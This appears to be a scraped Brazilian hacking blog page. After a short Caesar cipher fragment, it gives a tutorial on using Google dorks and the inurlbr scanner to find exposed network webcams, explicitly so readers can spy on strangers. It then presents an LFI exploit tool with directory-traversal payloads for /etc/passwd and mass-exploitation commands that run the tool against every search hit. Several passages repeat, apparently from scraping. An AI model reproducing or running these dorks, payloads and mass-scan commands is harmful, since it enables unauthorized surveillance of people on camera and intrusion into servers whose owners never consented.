            Funciona basicamente ao contrario você só ira precisar da chave, neste caso você conta 3 casa
           para trás retornando a mensagem original: aka.


    Então decidir fazer um programa em Python que encripta  e decripta frases utilizando a Cifra de César.
https://github.com/jh00nbr/Python/blob/master/cifradecesar.py

Looking webcam

Big Brother small

Human Everybody is curious and likes to eavesdrop on other people's lives, I created this little tutorial to help curisos deem webcans.
We will use simple techniques of Dorking and strings of validation within the inurlbr scanner.

DORK 1
inurl:"ViewerFrame?Mode=Refresh" & " Image Size" & intitle:"Network Camera"

 Human Everybody is curious and likes to eavesdrop on other people's lives, I created this little tutorial to help curisos deem webcans. We will use simple techniques of Dorking and strings of validation within the inurlbr scanner.  DORK 1 inurl:"ViewerFrame?Mode=Refresh" & " Image Size" & intitle:"Network Camera"

More search strings

Open webcam...


Now let's search mass webcam with the help of inurlbr scanner.

CAMMAND INURLBR 

SET DORK:
--dork 'inurl:"ViewerFrame?Mode=Refresh" & " Image Size" & intitle:"Network Camera"' 

SET OUTPUT:
-s can.log 

SET LEVEL TESTS STRINGS:
-t
   2 - The second type tries to valid the error defined by: -a='VALUE_INSIDE_THE _TARGET'

SET STRING TO BE SOUGHT WITHIN EACH TARGET:
-a 'Network Camera'
or
-a '<title>Network Camera'

this parameter will enter into the URL and validate if there is the desired string.
Another example of validation
-a 'Resolution='
Recommend using validation -a 'Resolution=' All webcam should set a resolution and not necessarily a title.. This parameter will enter into the URL and validate if there is the desired string.

Recommend using validation -a 'Resolution=' All webcam should set a resolution and not necessarily a title.
This parameter will enter into the URL and validate if there is the desired string.

Command full:
php inurlbr.php --dork 'inurl:"ViewerFrame?Mode=Refresh" & " Image Size" & intitle:"Network Camera"' -s can.log -t 2 -a 'Resolution=' 

PRINT OUTPUT SCANNER INURLBR VALIDATION:
Command full: php inurlbr.php --dork 'inurl:"ViewerFrame?Mode=Refresh" & " Image Size" & intitle:"Network Camera"' -s can.log -t 2 -a 'Resolution='   PRINT OUTPUT SCANNER INURLBR VALIDATION:

OUT PUT TERMINAL VIDEO:

More dorsk webcan.

domingo, 5 de julho de 2015

Tool lfiINURL - exploring Local File Inclusion

lfiINURL
Tool Description

The script runs tests searching for the directory that contains the password file server / directory traversal Exemple:
Tool Description  The script runs tests searching for the directory that contains the password file server / directory traversal Exemple:

http://target.br/file.php?open=/etc/passwd
http://target.br/file.php?open=../etc/passwd
http://target.br/file.php?open=../../etc/passwd
http://target.br/file.php?open=../../../etc/passwd
http://target.br/file.php?open=../../../../etc/passwd

AUTOR:        googleINURL
EMAIL:        inurlbr@gmail.com
Blog:         http://blog.inurl.com.br
Twitter:      https://twitter.com/googleinurl
Fanpage:      https://fb.com/InurlBrasil
Pastebin      http://pastebin.com/u/Googleinurl
GIT:          https://github.com/googleinurl
PSS:          http://packetstormsecurity.com/user/googleinurl
YOUTUBE:      http://youtube.com/c/INURLBrasil
PLUS:         http://google.com/+INURLBrasil

Vulnerability Description

Local File Inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts,we should keep in mind that it is also common in other technologies such as JSP, ASP and others.

In successful cases If the above mentioned conditions are met, an attacker would see something like the following:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
alex:x:500:500:alex:/home/alex:/bin/bash
margo:x:501:501::/home/margo:/bin/bash

Download tool lfiINURL
https://github.com/googleinurl/lfiINURL

COMMAND EXPLOIT --help

   -t : SET TARGET.
   -c : COUNT DIR.
        ex: -c   3 = /etc/passwd, ../etc/passwd, ../../etc/passwd ...
   Execute:
                 php lfiINURL.php -t target.br/index.file?= -c 50

Demonstration execution
Demonstration execution

USE SCANNER INURLBR MASS EXPLOIT COMMAND EXEMPLE
Download scanner inurlbr 1.0
https://github.com/googleinurl/SCANNER-INURLBR

inurlbr.php --dork 'br+index.p=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&index.p=" && php lfiINURL.php -t $URL -c 10'

inurlbr.php --dork 'include=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&include=" && php lfiINURL.php -t $URL -c 10'

inurlbr.php --dork 'cn+page=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&page=" && php lfiINURL.php -t $URL -c 10'

inurlbr.php --dork 'cn+page=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&page=" && php lfiINURL.php -t $URL -c 10'

# OBS USE UNIX

Demonstration execution xpl + inurlbr
Demonstration execution xpl + inurlbr


References
[1] https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
[2] http://www.wikipedia.org/wiki/Local_File_Inclusion
[3] https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo